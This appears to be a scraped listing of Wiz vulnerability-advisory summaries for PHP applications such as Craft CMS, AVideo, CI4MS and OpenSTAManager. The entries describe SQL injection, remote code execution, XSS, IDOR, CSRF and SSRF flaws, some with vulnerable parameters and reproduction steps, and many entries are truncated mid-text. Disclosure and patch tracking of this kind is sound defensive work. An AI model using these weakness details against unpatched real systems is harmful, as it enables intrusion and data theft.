OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contain a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.
Source : NVD
## 8.7
Score
Published February 6, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Per
Wiz
CVE-2026-25498 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-25498 [HIGH] CVE-2026-25498 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25498 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, a Remote Code Execution (RCE) vulnerability exists in Craft CMS where the assembleLayoutFromPost() function in src/services/Fields.php fails to sanitize user-supplied configuration data before passing it to Craft::createObject(). This allows authenticated administrators to inject malicious Yii2 behavior configurations that execute arbitrary system commands on the server. This vulnerability represents an unpatched variant of the behavior injection vulnerability addressed in CVE-2025-68455, affecting different endpoints through a separate code path. This vulnerability is fixed in 5.8.22.
Source : NVD
## 8.
Wiz
CVE-2026-25510 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.9
CVE-2026-25510 [CRITICAL] CVE-2026-25510 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25510 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.28.5.0, an authenticated user with file editor permissions can achieve Remote Code Execution (RCE) by leveraging the file creation and save endpoints, an attacker can upload and execute arbitrary PHP code on the server. This issue has been patched in version 0.28.5.0.
Source : NVD
## 8.8
Score
Published February 3, 2026
Severity HIGH
CNA Score 9.9
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.1
Exploitation Probability (EPSS) 0.1
Aff
Wiz
GHSA-654x-9q7r-g966 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-654x-9q7r-g966 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-654x-9q7r-g966 :
PHP vulnerability analysis and mitigation
Summary The authentication implementation in CI4MS is vulnerable to email enumeration. An unauthenticated attacker can determine whether an email address is registered in the system by analyzing the application's response during the password reset process. Vulnerability Details
The password reset flow returns different responses based on whether the provided email address exists in the database or not.
If the email is registered, the system typically returns a success message (e.g., "Password reset link has been sent").If the email is not registered, the system returns an error message (e.g., "User not found" or a different HTTP status code).This discrepancy allows attackers to programmatically "enumerate" or confirm va
Wiz
CVE-2026-23959 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23959 [MEDIUM] CVE-2026-23959 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23959 :
PHP vulnerability analysis and mitigation
CustomerTransformerController
Source : NVD
## 6.9
Score
Published January 22, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
coreshop/core-shop
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Jan 22, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA
Wiz
CVE-2026-33548 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33548 [HIGH] CVE-2026-33548 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33548 :
PHP vulnerability analysis and mitigation
$this->tag_name
Source : NVD
## 8.6
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mantisbt/mantisbt
Sources
NVD
Composer Severity HIGH Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIG
Wiz
CVE-2026-33483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33483 [HIGH] CVE-2026-33483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33483 :
PHP vulnerability analysis and mitigation
aVideoEncoderChunk.json.php
/tmp/
Source : NVD
## 7.5
Score
Published March 23, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 60.3
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3
Wiz
CVE-2026-24415 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-24415 [MEDIUM] CVE-2026-24415 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24415 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. OpenSTAManager v2.9.8 and earlier contains Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.
Source : NVD
## 5.1
Score
Published March 3, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
H
Wiz
CVE-2026-34375 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-34375 [HIGH] CVE-2026-34375 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34375 :
PHP vulnerability analysis and mitigation
$_REQUEST['plugin']
plugin
security.php
User::getUserName()
User::getUserPass()
Source : NVD
## 8.2
Score
Published March 27, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity HIGH No Fix Added at: Mar 31, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA
Wiz
GHSA-4mgv-366x-qxvx Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-4mgv-366x-qxvx Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-4mgv-366x-qxvx :
PHP vulnerability analysis and mitigation
## Overview of all XSS Reports
_includes/forms/checkbox.twig
_includes/forms/editableTable.twig
helpers/Cp.php
## Summary
checkbox.twig
{{ label|raw }}
## Affected Sources
1
/admin/settings/sections
Entries field -> Sources checklist
2
/admin/settings/assets/volumes/{vol_id}
Assets field -> Sources checklist
3
/admin/settings/users/groups
Users field -> Sources, User permissions page
4
/admin/settings/globals
User permissions page
5
Generated Fields Name (Volumes, Users, etc.)
Card Attributes checkboxes
6
/admin/settings/fields
User profile pages
7
/admin/users
Users field -> Sources checklist
## Proof of Concept
## Required Permissions (Attacker)
Admin access
allowAdminChanges
##
Wiz
GHSA-6j87-m5qx-9fqp Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-6j87-m5qx-9fqp Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6j87-m5qx-9fqp :
PHP vulnerability analysis and mitigation
editableTable.twig
Row Heading
## Prerequisites
An administrator account
allowAdminChanges
## Steps to Reproduce
Navigate to Settings → Fields and create a new field with Type: Table
Row Heading
Static Rows
Use the field in any object (e.g., user profile fields) → then visit any user’s profile
Notice the XSS execution
## Resources
https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a
Source : NVD
## 2.3
Score
Published February 25, 2026
Severity LOW
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Wiz
CVE-2026-24739 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-24739 [MEDIUM] CVE-2026-24739 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24739 :
PHP vulnerability analysis and mitigation
=
rmdir
del
=
=
MSYS2_ARG_CONV_EXCL
Source : NVD
## 6.3
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
PHP
Symfony
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
drupal-11.3
nextcloud-server-33
Sources
Chainguard Has Fix Added at: Feb 18, 2026
Composer Severity MEDIUM Has Fix Added at: Jan 29, 2026
Linux Severity MEDIUM Has Fix Added at: Jan 29, 2026
Wolfi Has Fix Added at: Mar 29, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 04, 2026
## Get a CVE risk assessment
Get a prioritized view of CV
Wiz
CVE-2026-31867 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.3
CVE-2026-31867 [MEDIUM] CVE-2026-31867 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31867 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.11.0 and 5.6.0, An Insecure Direct Object Reference (IDOR) vulnerability exists in Craft Commerce’s cart functionality that allows users to hijack any shopping cart by knowing or guessing its 32-character number. The CartController accepts a user-supplied number parameter to load and modify shopping carts. No ownership validation is performed - the code only checks if the order exists and is incomplete, not whether the requester has authorization to access it. This vulnerability enables the takeover of shopping sessions and potential exposure of PII. This vulnerability is fixed in 4.11.0 and 5.6.0.
Source : NVD
## 6.3
Score
Published March 11, 2026
Severi
Wiz
CVE-2026-33204 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-33204 [HIGH] CVE-2026-33204 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33204 :
PHP vulnerability analysis and mitigation
SimpleJWT is a simple JSON web token library written in PHP. Prior to version 1.1.1, an unauthenticated attacker can perform a Denial of Service via JWE header tampering when PBES2 algorithms are used. Applications that call JWE::decrypt() on attacker-controlled JWEs using PBES2 algorithms are affected. This issue has been patched in version 1.1.1.
Source : NVD
## 7.5
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
kelvinmo/simplejwt
Sources
NVD
Composer Severity
Wiz
CVE-2026-33051 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33051 [MEDIUM] CVE-2026-33051 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33051 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). In versions 5.9.0-beta.1 through 5.9.10, the revision/draft context menu in the element editor renders the creator’s fullName as raw HTML due to the use of Template::raw() combined with Craft::t() string interpolation. A low-privileged control panel user (e.g., Author) can set their fullName to an XSS payload via the profile editor, then create an entry with two saves. If an administrator is logged in and executes a specifically crafted payload while an elevated session is active, the attacker’s account can be elevated to administrator. This issue has been fixed in version 5.9.11.
Source : NVD
## 5.3
Score
Published March 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected T
Wiz
CVE-2026-32263 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-32263 [HIGH] CVE-2026-32263 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32263 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.11, in src/controllers/EntryTypesController.php, the $settings array from parse_str is passed directly to Craft::configure() without Component::cleanseConfig(). This allows injecting Yii2 behavior/event handlers via "as" or "on" prefixed keys, the same attack vector as the original advisory. Craft control panel administrator permissions and allowAdminChanges must be enabled for this to work. This issue has been patched in version 5.9.11.
Source : NVD
## 8.6
Score
Published March 16, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CIS
Wiz
CVE-2026-3241 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3241 [MEDIUM] CVE-2026-3241 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3241 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a stored cross-site scripting (XSS) vulnerability exists in the "Legacy Form" block. An authenticated user with permissions to create or edit forms (e.g., a rogue administrator) can inject a persistent JavaScript payload into the options of a multiple-choice question (Checkbox List, Radio Buttons, or Select Box). This payload is then executed in the browser of any user who views the page containing the form. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks M3dium for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Tec
Wiz
CVE-2026-27126 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-27126 [MEDIUM] CVE-2026-27126 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27126 :
PHP vulnerability analysis and mitigation
editableTable.twig
html
allowAdminChanges
Source : NVD
## 5.9
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Feb 24, 2026
Windows Severity MEDIUM Has Fix Added at: Feb 24, 2026
Linux Severity MEDIUM Has Fix Added at: Mar 03, 2026
Windows Severity MEDIUM Has Fix Added at: Mar 03, 2026
## Get a CVE
Wiz
CVE-2026-32266 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.4
CVE-2026-32266 [LOW] CVE-2026-32266 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32266 :
PHP vulnerability analysis and mitigation
DefaultController->actionLoadBucketData()
Source : NVD
## 2.4
Score
Published March 18, 2026
Severity LOW
CNA Score 2.4
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
craftcms/google-cloud
Sources
NVD
Composer Severity LOW Has Fix Added at: Mar 17, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published dat
Wiz
CVE-2026-34558 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34558 [CRITICAL] CVE-2026-34558 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34558 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input within the Methods Management functionality when creating or managing application methods/pages. Multiple input fields accept attacker-controlled JavaScript payloads that are stored server-side without sanitization or output encoding. These stored values are later rendered directly into administrative interfaces and global navigation components without proper encoding, resulting in Stored DOM-Based Cross-Site Scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Wiz
CVE-2026-25484 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-25484 [MEDIUM] CVE-2026-25484 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25484 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. In versions from 4.0.0-RC1 to 4.10.0 and from 5.0.0 to 5.5.1, there is a Stored XSS via Product Type names. The name is not sanitized when displayed in user permissions settings. The vulnerable input (source) is in Commerce (Product Type settings), but the sink is in CMS user permissions settings. This issue has been patched in versions 4.10.1 and 5.5.2.
Source : NVD
## 4.8
Score
Published February 3, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.5
Exploitation Probability (EPSS) N/A
Affected packages an
Wiz
CVE-2026-30927 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-30927 [MEDIUM] CVE-2026-30927 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30927 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. Prior to 5.0.6, in modules/events/events_function.php, the event participation logic allows any user who can participate in an event to register OTHER users by manipulating the user_uuid GET parameter. The condition uses || (OR), meaning if possibleToParticipate() returns true (event is open for participation), ANY user - not just leaders - can specify a different user_uuid and register/cancel participation for that user. The code then operates on $user->getValue('usr_id') (the target user from user_uuid) rather than the current user. This vulnerability is fixed in 5.0.6.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Techno
Wiz
CVE-2026-26188 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-26188 [MEDIUM] CVE-2026-26188 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26188 :
PHP vulnerability analysis and mitigation
Solspace Freeform plugin for Craft CMS 5.x is a super flexible form-building tool. An authenticated, low-privilege user (able to create/edit forms) can inject arbitrary HTML/JS into the Craft Control Panel (CP) builder and integrations views. User-controlled form labels and integration metadata are rendered with dangerouslySetInnerHTML without sanitization, leading to stored XSS that executes when any admin views the builder/integration screens. This vulnerability is fixed in 5.14.7.
Source : NVD
## 5.1
Score
Published February 12, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Pe
Wiz
CVE-2026-25597 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25597 [MEDIUM] CVE-2026-25597 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25597 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Prior to 8.2.4 and 9.0.3, there is a time-based user enumeration vulnerability in the user authentication functionality of PrestaShop. This vulnerability allows an attacker to determine whether a customer account exists in the system by measuring response times. This vulnerability is fixed in 8.2.4 and 9.0.3.
Source : NVD
## 5.3
Score
Published February 6, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 23
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
cpe:2.3:a:prestashop:
Wiz
CVE-2025-67648 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2025-67648 [HIGH] CVE-2025-67648 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67648 :
PHP vulnerability analysis and mitigation
Shopware is an open commerce platform. Versions 6.4.6.0 through 6.6.10.9 and 6.7.0.0 through 6.7.5.0 have a Reflected XSS vulnerability in AuthController.php. A request parameter from the login page URL is directly rendered within the Twig template of the Storefront login page without further processing or input validation. This allows direct code injection into the template via the URL parameter, waitTime, which lacks proper input validation. This issue is fixed in versions 6.6.10.10 and 6.7.5.1.
Source : NVD
## 6.1
Score
Published December 11, 2025
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation P
Wiz
CVE-2023-7332 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2023-7332 [HIGH] CVE-2023-7332 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-7332 :
PHP vulnerability analysis and mitigation
PocketMine-MP versions prior to 4.18.1 contain an improper input validation vulnerability in inventory transaction handling. A remote attacker with a valid player session can request that the server drop more items than are available in the player's hotbar, triggering a server crash and resulting in denial of service.
Source : NVD
## 7.1
Score
Published December 31, 2025
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 52.6
Exploitation Probability (EPSS) 0.3
Affected packages and libraries
pocketmine/pocketmine-mp
Sources
NVD
Composer Severity HIGH Has Fix Added at:
Wiz
CVE-2026-32300 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-32300 [HIGH] CVE-2026-32300 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32300 :
PHP vulnerability analysis and mitigation
Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the My Page profile update feature may allow modification of arbitrary user information. Versions 1.41.1 and 2.41.1 contain a patch.
Source : NVD
## 8.1
Score
Published March 23, 2026
Severity HIGH
CNA Score 8.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
opensource-workshop/connect-cms
Sources
NVD
Composer Severity HIGH Has Fi
Wiz
CVE-2026-29058 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-29058 [CRITICAL] CVE-2026-29058 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29058 :
PHP vulnerability analysis and mitigation
AVideo is a video-sharing Platform software. Prior to version 7.0, an unauthenticated attacker can execute arbitrary OS commands on the server by injecting shell command substitution into the base64Url GET parameter. This can lead to full server compromise, data exfiltration (e.g., configuration secrets, internal keys, credentials), and service disruption. This issue has been patched in version 7.0.
Source : NVD
## 9.8
Score
Published March 6, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 97.9
Exploitation Probability (EPSS) 50.9
Affected packages and librar
Wiz
CVE-2026-29172 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-29172 [HIGH] CVE-2026-29172 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29172 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 4.10.2 and 5.5.3, Craft Commerce is vulnerable to SQL Injection in the purchasables table endpoint. The sort parameter is split by | and the first part (column name) is passed directly as an array key to orderBy() without whitelist validation. Yii2's query builder does NOT escape array keys, allowing an authenticated attacker to inject arbitrary SQL into the ORDER BY clause. This vulnerability is fixed in 4.10.2 and 5.5.3.
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Perce
Wiz
CVE-2026-28685 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-28685 [MEDIUM] CVE-2026-28685 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28685 :
PHP vulnerability analysis and mitigation
Kimai is a web-based multi-user time-tracking application. Prior to version 2.51.0, "GET /api/invoices/{id}" only checks the role-based view_invoice permission but does not verify the requesting user has access to the invoice's customer. Any user with ROLE_TEAMLEAD (which grants view_invoice) can read all invoices in the system, including those belonging to customers assigned to other teams. This issue has been patched in version 2.51.0.
Source : NVD
## 6.5
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Exploitation Probability (EPS
Wiz
CVE-2025-67737 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.1
CVE-2025-67737 [LOW] CVE-2025-67737 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67737 :
PHP vulnerability analysis and mitigation
AzuraCast is a self-hosted, all-in-one web radio management suite. Versions 0.23.1 mistakenly include an API endpoint that is intended for internal use by the SFTP software sftpgo, exposing it to the public-facing HTTP API for AzuraCast installations. A user with specific internal knowledge of a station's operations can craft a custom HTTP request that would affect the contents of a station's database, without revealing any internal information about the station. In order to carry out an attack, a malicious user would need to know a valid SFTP station username and the coordinating internal filesystem structure. This issue is fixed in version 0.23.2.
Source : NVD
## 3.7
Score
Published December 12, 2025
Severity LOW
CNA
Wiz
CVE-2026-21447 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-21447 [HIGH] CVE-2026-21447 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21447 :
PHP vulnerability analysis and mitigation
Bagisto is an open source laravel eCommerce platform. Prior to version 2.3.10, an Insecure Direct Object Reference vulnerability in the customer order reorder function allows any authenticated customer to add items from another customer's order to their own shopping cart by manipulating the order ID parameter. This exposes sensitive purchase information and enables potential fraud. Version 2.3.10 patches the issue.
Source : NVD
## 7.1
Score
Published January 2, 2026
Severity HIGH
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected package
Wiz
CVE-2026-32755 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.7
CVE-2026-32755 [MEDIUM] CVE-2026-32755 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32755 :
PHP vulnerability analysis and mitigation
Admidio is an open-source user management solution. In versions 5.0.6 and below, the save_membership action in modules/profile/profile_function.php saves changes to a member's role membership start and end dates but does not validate the CSRF token. The handler checks stop_membership and remove_former_membership against the CSRF token but omits save_membership from that check. Because membership UUIDs appear in the HTML source visible to authenticated users, an attacker can embed a crafted POST form on any external page and trick a role leader into submitting it, silently altering membership dates for any member of roles the victim leads. A role leader's session can be silently exploited via CSRF to manipulate any member's mem
Wiz
CVE-2026-34740 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2026-34740 [MEDIUM] CVE-2026-34740 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34740 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the EPG (Electronic Program Guide) link feature in AVideo allows authenticated users with upload permissions to store arbitrary URLs that the server fetches on every EPG page visit. The URL is validated only with PHP's FILTER_VALIDATE_URL, which accepts internal network addresses. Although AVideo has a dedicated isSSRFSafeURL() function for preventing SSRF, it is not called in this code path. This results in a stored server-side request forgery vulnerability that can be used to scan internal networks, access cloud metadata services, and interact with internal services. At time of publication, there are no publicly available patches.
Source : NVD
## 6.
Wiz
CVE-2026-32261 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2026-32261 [HIGH] CVE-2026-32261 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32261 :
PHP vulnerability analysis and mitigation
